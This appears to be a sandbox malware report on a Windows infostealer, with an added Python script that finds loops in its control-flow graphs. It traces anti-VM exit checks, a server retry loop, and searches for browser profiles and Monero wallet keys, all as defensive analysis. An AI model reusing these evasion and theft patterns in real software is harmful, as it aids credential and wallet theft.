                          control_flow_graph 1301 c017a0-c017cd call c0aad0 StrCmpCA 1304 c017d7-c017f1 call c0aad0 1301->1304 1305 c017cf-c017d1 ExitProcess 1301->1305 1309 c017f4-c017f8 1304->1309 1310 c019c2-c019cd call c0a800 1309->1310 1311 c017fe-c01811 1309->1311 1312 c01817-c0181a 1311->1312 1313 c0199e-c019bd 1311->1313 1315 c01821-c01830 call c0a820 1312->1315 1316 c01849-c01858 call c0a820 1312->1316 1317 c018ad-c018be StrCmpCA 1312->1317 1318 c018cf-c018e0 StrCmpCA 1312->1318 1319 c0198f-c01999 call c0a820 1312->1319 1320 c01970-c01981 StrCmpCA 1312->1320 1321 c018f1-c01902 StrCmpCA 1312->1321 1322 c01951-c01962 StrCmpCA 1312->1322 1323 c01932-c01943 StrCmpCA 1312->1323 1324 c01913-c01924 StrCmpCA 1312->1324 1325 c01835-c01844 call c0a820 1312->1325 1326 c0185d-c0186e StrCmpCA 1312->1326 1327 c0187f-c01890 StrCmpCA 1312->1327 1313->1309 1315->1313 1316->1313 1342 c018c0-c018c3 1317->1342 1343 c018ca 1317->1343 1344 c018e2-c018e5 1318->1344 1345 c018ec 1318->1345 1319->1313 1332 c01983-c01986 1320->1332 1333 c0198d 1320->1333 1346 c01904-c01907 1321->1346 1347 c0190e 1321->1347 1329 c01964-c01967 1322->1329 1330 c0196e 1322->1330 1350 c01945-c01948 1323->1350 1351 c0194f 1323->1351 1348 c01930 1324->1348 1349 c01926-c01929 1324->1349 1325->1313 1338 c01870-c01873 1326->1338 1339 c0187a 1326->1339 1340 c01892-c0189c 1327->1340 1341 c0189e-c018a1 1327->1341 1329->1330 1330->1313 1332->1333 1333->1313 1338->1339 1339->1313 1355 c018a8 1340->1355 1341->1355 1342->1343 1343->1313 1344->1345 1345->1313 1346->1347 1347->1313 1348->1313 1349->1348 1350->1351 1351->1313 1355->1313
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 00C017C5
                          • ExitProcess.KERNEL32 ref: 00C017D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: d565041be0d9cd8e063be5370c1ef4d34fe89df73c375ffded7969ba03bf9da6
                          • Instruction ID: 2f3aea74984c1f6506f6704cfba2fd2eddb79e71ea2caf1d1bdf6e4e62ed7745
                          • Opcode Fuzzy Hash: d565041be0d9cd8e063be5370c1ef4d34fe89df73c375ffded7969ba03bf9da6
                          • Instruction Fuzzy Hash: 35517EB4A00209EFCB04DFA5D958BBEB7B5BF44704F18805CE816A72C0D770EA85DB62

                          Control-flow Graph

                          control_flow_graph 1356 c07500-c0754a GetWindowsDirectoryA 1357 c07553-c075c7 GetVolumeInformationA call c08d00 * 3 1356->1357 1358 c0754c 1356->1358 1365 c075d8-c075df 1357->1365 1358->1357 1366 c075e1-c075fa call c08d00 1365->1366 1367 c075fc-c07617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 c07628-c07658 wsprintfA call c0a740 1367->1368 1369 c07619-c07626 call c0a740 1367->1369 1377 c0767e-c0768e 1368->1377 1369->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00C07542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C0757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C0760A
                          • wsprintfA.USER32 ref: 00C07640
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\
                          • API String ID: 1544550907-3809124531
                          • Opcode ID: 3502b857db95fd071d3f7769ee1d6c0c186385f963a24860daf741ea021e8349
                          • Instruction ID: 805e6838c6332ac78275172e68387c9ab888a434089ece168a1a33f0abd3b525
                          • Opcode Fuzzy Hash: 3502b857db95fd071d3f7769ee1d6c0c186385f963a24860daf741ea021e8349
                          • Instruction Fuzzy Hash: E941AFB1D04248AFDB14DB94CC49BEEBBB8AF08700F144199F509672C0D7796A88CFA1

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E0588), ref: 00C098A1
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E05A0), ref: 00C098BA
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E06C0), ref: 00C098D2
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E05B8), ref: 00C098EA
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E0690), ref: 00C09903
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E87F0), ref: 00C0991B
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006D66A0), ref: 00C09933
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006D6A20), ref: 00C0994C
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E05D0), ref: 00C09964
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E0768), ref: 00C0997C
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E06D8), ref: 00C09995
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E0630), ref: 00C099AD
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006D6680), ref: 00C099C5
                            • Part of subcall function 00C09860: GetProcAddress.KERNEL32(75900000,006E06F0), ref: 00C099DE
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00BF11D0: ExitProcess.KERNEL32 ref: 00BF1211
                            • Part of subcall function 00BF1160: GetSystemInfo.KERNEL32(?), ref: 00BF116A
                            • Part of subcall function 00BF1160: ExitProcess.KERNEL32 ref: 00BF117E
                            • Part of subcall function 00BF1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BF112B
                            • Part of subcall function 00BF1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BF1132
                            • Part of subcall function 00BF1110: ExitProcess.KERNEL32 ref: 00BF1143
                            • Part of subcall function 00BF1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BF123E
                            • Part of subcall function 00BF1220: ExitProcess.KERNEL32 ref: 00BF1294
                            • Part of subcall function 00C06770: GetUserDefaultLangID.KERNEL32 ref: 00C06774
                            • Part of subcall function 00BF1190: ExitProcess.KERNEL32 ref: 00BF11C6
                            • Part of subcall function 00C07850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BF11B7), ref: 00C07880
                            • Part of subcall function 00C07850: RtlAllocateHeap.NTDLL(00000000), ref: 00C07887
                            • Part of subcall function 00C07850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C0789F
                            • Part of subcall function 00C078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07910
                            • Part of subcall function 00C078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C07917
                            • Part of subcall function 00C078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C0792F
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006E8860,?,00C1110C,?,00000000,?,00C11110,?,00000000,00C10AEF), ref: 00C06ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C06AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00C06AF9
                          • Sleep.KERNEL32(00001770), ref: 00C06B04
                          • CloseHandle.KERNEL32(?,00000000,?,006E8860,?,00C1110C,?,00000000,?,00C11110,?,00000000,00C10AEF), ref: 00C06B1A
                          • ExitProcess.KERNEL32 ref: 00C06B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2931873225-0
                          • Opcode ID: d7bb89fa2fe41764f8a32fdbd48f3f0017a8d154423c15018d18c2ebf7aa8602
                          • Instruction ID: e70bb704a793817cf7ce147e4e5ad236d21a092e20c0e8921153374476fcad78
                          • Opcode Fuzzy Hash: d7bb89fa2fe41764f8a32fdbd48f3f0017a8d154423c15018d18c2ebf7aa8602
                          • Instruction Fuzzy Hash: F731F071A10208ABDB04FBF1DC5ABFE7778AF04340F144628F652B61D1DF706A45EAA6

                          Control-flow Graph

                          control_flow_graph 1436 c06af3 1437 c06b0a 1436->1437 1439 c06aba-c06ad7 call c0aad0 OpenEventA 1437->1439 1440 c06b0c-c06b22 call c06920 call c05b10 CloseHandle ExitProcess 1437->1440 1446 c06af5-c06b04 CloseHandle Sleep 1439->1446 1447 c06ad9-c06af1 call c0aad0 CreateEventA 1439->1447 1446->1437 1447->1440
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006E8860,?,00C1110C,?,00000000,?,00C11110,?,00000000,00C10AEF), ref: 00C06ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C06AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00C06AF9
                          • Sleep.KERNEL32(00001770), ref: 00C06B04
                          • CloseHandle.KERNEL32(?,00000000,?,006E8860,?,00C1110C,?,00000000,?,00C11110,?,00000000,00C10AEF), ref: 00C06B1A
                          • ExitProcess.KERNEL32 ref: 00C06B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: 03646db8858ccd553846242384c54838c09ded4cc2cab3c5f54092a1cfb8e711
                          • Instruction ID: baf86b2d49356a12d7e7d710661ab1640659be895cde241b950a6d25b99d1b5b
                          • Opcode Fuzzy Hash: 03646db8858ccd553846242384c54838c09ded4cc2cab3c5f54092a1cfb8e711
                          • Instruction Fuzzy Hash: BFF03470A4021AAFEB00AFA19C0ABBE7A34EB04701F144525F653A11D1CBB05684FAAA
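Each `control_flow_graph` line on this page is a flat token stream: a decimal block id, its address or address range, the calls made in that block, and `src->dst` tokens for the edges. Two things worth pulling out mechanically are the loops (a block whose edge lands on an earlier block) and whether a loop body contains a Sleep, because that is what separates the 60 s retry loop in the c05510 routine (block 1197, Sleep(0xEA60), edge 1197->1106) and the 6 s wait in the event gate above (block 1446, Sleep(0x1770), edge 1446->1437) from straight-line code that simply ends in ExitProcess. The parser below is an added example written for this page, not Joe Sandbox's own code; it assumes only the token grammar visible in these lines (an address token is five or more hex digits, optionally a range), and the two sample graphs are copied verbatim from the records above, reflowed at spaces.

```python
import re
from collections import defaultdict

# Constructed sample inputs: two control_flow_graph lines copied verbatim from the records
# above, reflowed at spaces only (the parser splits on any whitespace).
# The event gate: OpenEventA / CreateEventA / Sleep / ExitProcess.
EVENT_GATE_CFG = """control_flow_graph 1436 c06af3 1437 c06b0a 1436->1437 1439 c06aba-c06ad7 call c0aad0
OpenEventA 1437->1439 1440 c06b0c-c06b22 call c06920 call c05b10 CloseHandle ExitProcess 1437->1440
1446 c06af5-c06b04 CloseHandle Sleep 1439->1446 1447 c06ad9-c06af1 call c0aad0 CreateEventA 1439->1447
1446->1437 1447->1440"""
# The c05510 routine with its Sleep(0xEA60) block 1197 and the back edge 1197->1106.
C2_LOOP_CFG = """control_flow_graph 1090 c05510-c05577 call c05ad0 call c0a820 * 3 call c0a740 * 4 1106 c0557c-c05583
1090->1106 1107 c05585-c055b6 call c0a820 call c0a7a0 call bf1590 call c051f0 1106->1107 1108 c055d7-c0564c call c0a740
* 2 call bf1590 call c052c0 call c0a8a0 call c0a800 call c0aad0 StrCmpCA 1106->1108 1124 c055bb-c055d2 call c0a8a0
call c0a800 1107->1124 1134 c05693-c056a9 call c0aad0 StrCmpCA 1108->1134 1137 c0564e-c0568e call c0a7a0 call bf1590
call c051f0 call c0a8a0 call c0a800 1108->1137 1124->1134 1140 c057dc-c05844 call c0a8a0 call c0a820 * 2 call bf1670
call c0a800 * 4 call c06560 call bf1550 1134->1140 1141 c056af-c056b6 1134->1141 1137->1134 1272 c05ac3-c05ac6
1140->1272 1142 c057da-c0585f call c0aad0 StrCmpCA 1141->1142 1143 c056bc-c056c3 1141->1143 1161 c05991-c059f9
call c0a8a0 call c0a820 * 2 call bf1670 call c0a800 * 4 call c06560 call bf1550 1142->1161 1162 c05865-c0586c
1142->1162 1146 c056c5-c05719 call c0a820 call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1143->1146
1147 c0571e-c05793 call c0a740 * 2 call bf1590 call c052c0 call c0a8a0 call c0a800 call c0aad0 StrCmpCA 1143->1147
1146->1142 1147->1142 1250 c05795-c057d5 call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1147->1250
1161->1272 1167 c05872-c05879 1162->1167 1168 c0598f-c05a14 call c0aad0 StrCmpCA 1162->1168 1174 c058d3-c05948
call c0a740 * 2 call bf1590 call c052c0 call c0a8a0 call c0a800 call c0aad0 StrCmpCA 1167->1174 1175 c0587b-c058ce
call c0a820 call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1167->1175 1197 c05a16-c05a21 Sleep
1168->1197 1198 c05a28-c05a91 call c0a8a0 call c0a820 * 2 call bf1670 call c0a800 * 4 call c06560 call bf1550
1168->1198 1174->1168 1276 c0594a-c0598a call c0a7a0 call bf1590 call c051f0 call c0a8a0 call c0a800 1174->1276
1175->1168 1197->1106 1198->1272 1250->1142 1276->1168"""

ADDR_RE = re.compile(r"^[0-9a-f]{5,}(-[0-9a-f]{5,})?$")  # block address or address range
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")

def parse_cfg(text):
    """Return (nodes, succs): nodes maps block id -> {'addr', 'labels'}; succs maps id -> successor ids."""
    tokens = text.split()
    nodes, succs, current, i = {}, defaultdict(list), None, 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            succs[int(edge.group(1))].append(int(edge.group(2)))
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = int(tok)                    # a block id is always followed by its address
            nodes[current] = {"addr": tokens[i + 1], "labels": []}
            i += 1
        elif current is not None:
            nodes[current]["labels"].append(tok)  # 'call', callee addresses, '* 3' repeats, API names
        i += 1
    return nodes, succs

def find_back_edges(nodes, succs):
    """DFS edges that land on a block still on the stack; each closes a loop whose header is its target."""
    state, back = {}, set()

    def visit(n):
        state[n] = "active"
        for s in succs.get(n, []):
            if state.get(s) == "active":
                back.add((n, s))
            elif s not in state:
                visit(s)
        state[n] = "done"

    for n in nodes:
        if n not in state:
            visit(n)
    return back

def loop_body(succs, back_edge):
    """Natural loop of tail->header: the header plus every block reaching the tail without crossing it."""
    tail, header = back_edge
    preds = defaultdict(list)
    for src, dsts in succs.items():
        for dst in dsts:
            preds[dst].append(src)
    body, work = {header, tail}, [tail]
    while work:
        n = work.pop()
        if n == header:
            continue
        for p in preds[n]:
            if p not in body:
                body.add(p)
                work.append(p)
    return body

def blocks_calling(nodes, api):
    return {n for n, info in nodes.items() if api in info["labels"]}

def summarize(text):
    """Per loop: header, tail, size, Sleep blocks inside it, and ExitProcess blocks outside it."""
    nodes, succs = parse_cfg(text)
    report = []
    for tail, header in sorted(find_back_edges(nodes, succs)):
        body = loop_body(succs, (tail, header))
        report.append({"header": header, "tail": tail, "size": len(body),
                       "sleep_blocks": sorted(blocks_calling(nodes, "Sleep") & body),
                       "exits": sorted(blocks_calling(nodes, "ExitProcess") - body)})
    return report

if __name__ == "__main__":
    for name, cfg in (("event gate", EVENT_GATE_CFG), ("c05510", C2_LOOP_CFG)):
        print(name, summarize(cfg))
```

On the event-gate graph it reports one loop with header 1437 and body {1437, 1439, 1446}, containing the Sleep block, with the ExitProcess block 1440 outside it: read with the API list, the routine repeats OpenEventA, CloseHandle, Sleep(0x1770) while the event can be opened, and only the CreateEventA path (1447) leads to the calls in 1440 and then ExitProcess. On the c05510 graph it reports the single back edge 1197->1106 whose natural loop covers 19 of the 24 blocks; the five outside it (1090, 1140, 1161, 1198, 1272) are the entry and the paths that leave the routine, so every StrCmpCA against ERROR in that function sits inside the 60 s retry loop.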

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BF4839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BF4849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 149d95490d581f8bbebe4880447bc626973eb2c4501372b164331dc204829962
                          • Instruction ID: 59173f98c30378d79cb5270de2dfc5d474286bbeedf1668bcffbee529b5aaa78
                          • Opcode Fuzzy Hash: 149d95490d581f8bbebe4880447bc626973eb2c4501372b164331dc204829962
                          • Instruction Fuzzy Hash: B0213BB1D00208ABDF14DFA5EC4AADD7B78FB44320F108225F965A72D0DB706A0ADF91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                            • Part of subcall function 00BF6280: InternetOpenA.WININET(00C10DFE,00000001,00000000,00000000,00000000), ref: 00BF62E1
                            • Part of subcall function 00BF6280: StrCmpCA.SHLWAPI(?,006EE4D0), ref: 00BF6303
                            • Part of subcall function 00BF6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BF6335
                            • Part of subcall function 00BF6280: HttpOpenRequestA.WININET(00000000,GET,?,006EDC58,00000000,00000000,00400100,00000000), ref: 00BF6385
                            • Part of subcall function 00BF6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BF63BF
                            • Part of subcall function 00BF6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BF63D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C05228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 1499b8a74bee3c9d4dac275f005bca1684c9755972faf4aa1bd809e87729367b
                          • Instruction ID: d51e0d5135be7111021df5dac66445e16ee554f7e33c2b88922ff13cfe465e0f
                          • Opcode Fuzzy Hash: 1499b8a74bee3c9d4dac275f005bca1684c9755972faf4aa1bd809e87729367b
                          • Instruction Fuzzy Hash: 85115230900208ABDB14FF75DD52EED7378AF50300F408568F91A5B1D2EF34AB09EA91

                          Control-flow Graph

                          [Control-flow graph: the function at bf1220 calls GlobalMemoryStatusEx (via c089b0) and then c0da00 twice; after the check at bf1281-bf1285 execution either continues to bf129a or reaches the block at bf1292-bf1294, which calls ExitProcess.]
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BF123E
                          • ExitProcess.KERNEL32 ref: 00BF1294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 50b4111c9db7c445f7be1b92b3e4a3d6716851109f9e32edce35b02b2a232774
                          • Instruction ID: 79866bc1dafb6ebf64a443dc7c344d3ed37bc0b9fd6add8852785daebda32b52
                          • Opcode Fuzzy Hash: 50b4111c9db7c445f7be1b92b3e4a3d6716851109f9e32edce35b02b2a232774
                          • Instruction Fuzzy Hash: F2014FB094030CEAEB10DFD4CC49BAEBBB8AB04701F248899E705B71C0D77455499B59
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BF112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BF1132
                          • ExitProcess.KERNEL32 ref: 00BF1143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 594b3f7dadd9398755d5b5e4032888098b4ac685e6ff17843ce4475ae66e9d71
                          • Instruction ID: 572d6089f85ec26af9ddef0759cd8b712119cbea78972642913fa2a2b51297a2
                          • Opcode Fuzzy Hash: 594b3f7dadd9398755d5b5e4032888098b4ac685e6ff17843ce4475ae66e9d71
                          • Instruction Fuzzy Hash: 1FE0E67094534CFFE7146BA5DC0EB197AB8EB04B01F104495F709771D0D6B526449699
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BF10B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BF10F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 02395376db9b721b5b5f5ad06a646033d3b901623aa7d0720db504be4fb43b20
                          • Instruction ID: 7e0507bf8e8e5db686724f0eb2d060d4d8a3bb6c5253f09593358e193d060026
                          • Opcode Fuzzy Hash: 02395376db9b721b5b5f5ad06a646033d3b901623aa7d0720db504be4fb43b20
                          • Instruction Fuzzy Hash: BFF0E271641208BBE7149AB8AC4DFBAB7E8E705B15F300858F644E3280D9719E48DAA0
                          APIs
                            • Part of subcall function 00C078E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07910
                            • Part of subcall function 00C078E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C07917
                            • Part of subcall function 00C078E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C0792F
                            • Part of subcall function 00C07850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BF11B7), ref: 00C07880
                            • Part of subcall function 00C07850: RtlAllocateHeap.NTDLL(00000000), ref: 00C07887
                            • Part of subcall function 00C07850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C0789F
                          • ExitProcess.KERNEL32 ref: 00BF11C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 9881e37541bcd2cb7198f90988d4143fe6963d19473674121f4caedb795eaf32
                          • Instruction ID: c45eacd7ea78f7ee8b6265237479c5a3f07f5085b2ac00c751754863168cd2a1
                          • Opcode Fuzzy Hash: 9881e37541bcd2cb7198f90988d4143fe6963d19473674121f4caedb795eaf32
                          • Instruction Fuzzy Hash: 3CE012B5E1430957CA0473B6AC0FB2A369C9B14349F084D39FB45F3582FA25F948E566
                          APIs
                          • wsprintfA.USER32 ref: 00C038CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 00C038E3
                          • lstrcat.KERNEL32(?,?), ref: 00C03935
                          • StrCmpCA.SHLWAPI(?,00C10F70), ref: 00C03947
                          • StrCmpCA.SHLWAPI(?,00C10F74), ref: 00C0395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00C03C67
                          • FindClose.KERNEL32(000000FF), ref: 00C03C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: ae5a3fbede72127983c21a7b0c02a97c0e53e8b9ef22ab10924b71175c875341
                          • Instruction ID: b19b09795eba67a312ac9a7a258aca4b6fd15f8feb6bc9ef8ca8426cf029c83d
                          • Opcode Fuzzy Hash: ae5a3fbede72127983c21a7b0c02a97c0e53e8b9ef22ab10924b71175c875341
                          • Instruction Fuzzy Hash: 5BA15171A002089FDB24DFA5DC89FFA777CBB54300F084598A659A6181DB719BC8CF62
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00C10B32,00C10B2B,00000000,?,?,?,00C113F4,00C10B2A), ref: 00BFBEF5
                          • StrCmpCA.SHLWAPI(?,00C113F8), ref: 00BFBF4D
                          • StrCmpCA.SHLWAPI(?,00C113FC), ref: 00BFBF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFC7BF
                          • FindClose.KERNEL32(000000FF), ref: 00BFC7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: 9b2750e86c375a924e28799bb691158e3e135914dc15ff473a7da4ed2e2afd71
                          • Instruction ID: f2ceaa2038fc589449e6db8843f2b89b2ec230c869fbd23b18803b94a1ac72fc
                          • Opcode Fuzzy Hash: 9b2750e86c375a924e28799bb691158e3e135914dc15ff473a7da4ed2e2afd71
                          • Instruction Fuzzy Hash: 9F4245729102089BCB14FB74DD96EED777DAB94300F4085A8B906A71C1EE349B4DDB92
                          APIs
                          • wsprintfA.USER32 ref: 00C0492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00C04943
                          • StrCmpCA.SHLWAPI(?,00C10FDC), ref: 00C04971
                          • StrCmpCA.SHLWAPI(?,00C10FE0), ref: 00C04987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00C04B7D
                          • FindClose.KERNEL32(000000FF), ref: 00C04B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
